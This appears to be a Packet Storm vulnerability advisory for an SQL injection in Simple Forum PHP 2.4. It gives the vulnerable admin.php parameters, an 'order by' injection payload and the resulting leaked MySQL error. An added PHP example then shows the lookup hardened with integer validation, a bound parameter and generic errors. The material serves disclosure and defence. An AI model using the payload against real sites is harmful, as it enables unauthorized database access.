Simple Forum PHP 2.4 SQL Injection

2016-10-14T00:00:00
ID PACKETSTORM:139170
Type packetstorm
Reporter Ehsan Hosseini
Modified 2016-10-14T00:00:00

Description

                                        
                                            `=====================================================  
# Simple Forum PHP 2.4 - SQL Injection  
=====================================================  
# Vendor Homepage: http://simpleforumphp.com  
# Date: 14 Oct 2016  
# Demo Link : http://simpleforumphp.com/forum/admin.php  
# Version : 2.4  
# Platform : WebApp - PHP  
# Author: Ashiyane Digital Security Team  
# Contact: hehsan979@gmail.com  
=====================================================  
# PoC:  
Vulnerable Url:  
http://localhost/forum/admin.php?act=replies&topic_id=[payload]  
http://localhost/forum/admin.php?act=editTopic&id=[payload]  
Vulnerable parameter : topic_id , id  
Method : GET  
  
A simple injection:  
Payload : '+order+by+100--+  
http://simpleblogphp.com/blog/admin.php?act=editPost&id=1'+order+by+999--+  
  
The response shows the result:  
Could not execute MySQL query: SELECT * FROM demo_forum_topics WHERE  
id='' order by 100-- ' . Error: Unknown column '100' in 'order clause'  
  
Result of payload: Error: Unknown column '100' in 'order clause'  
=====================================================  
# Discovered By : Ehsan Hosseini  
=====================================================  
`
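
A defensive counterpart to the PoC above, added here as an example (it is not code from Simple Forum PHP or from the advisory's author): the lookup on `demo_forum_topics` rewritten with integer validation, a bound parameter, and no database error text in the response. The helper names, the `title` column and the in-memory SQLite database standing in for MySQL are assumptions.

```php
<?php
// Added example: hardened form of the topic lookup behind
// admin.php?act=editTopic&id=... (the application's real code is not on the page).
// Assumption: in-memory SQLite stands in for the MySQL database so this runs offline.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

// Constructed sample data; only the table name comes from the advisory's error text.
$pdo->exec('CREATE TABLE demo_forum_topics (id INTEGER PRIMARY KEY, title TEXT)');
$pdo->exec("INSERT INTO demo_forum_topics (id, title) VALUES (1, 'Welcome')");

// Hypothetical helper: fetch one topic by id, or null if the id is invalid or unknown.
function findTopic(PDO $pdo, $rawId): ?array
{
    // 1. Allow-list the input: the id must be a positive integer, nothing else.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    // 2. Bind the value instead of concatenating it into the SQL text.
    $stmt = $pdo->prepare('SELECT id, title FROM demo_forum_topics WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Hypothetical request handler: database errors are logged server-side and the
// client gets a generic message, never the query text or the driver error.
function handleEditTopic(PDO $pdo, array $query): string
{
    try {
        $topic = findTopic($pdo, $query['id'] ?? '');
    } catch (PDOException $e) {
        error_log('topic lookup failed: ' . $e->getMessage());
        return '500 Internal error';
    }
    return $topic === null ? '404 Topic not found' : '200 ' . $topic['title'];
}

// Constructed inputs: a valid id, then the string from the advisory's PoC.
echo handleEditTopic($pdo, ['id' => '1']), PHP_EOL;
echo handleEditTopic($pdo, ['id' => "'+order+by+100--+"]), PHP_EOL;
```

The same pattern applies to the `topic_id` parameter of `act=replies`: validate as an integer, bind it, and keep query text out of error responses.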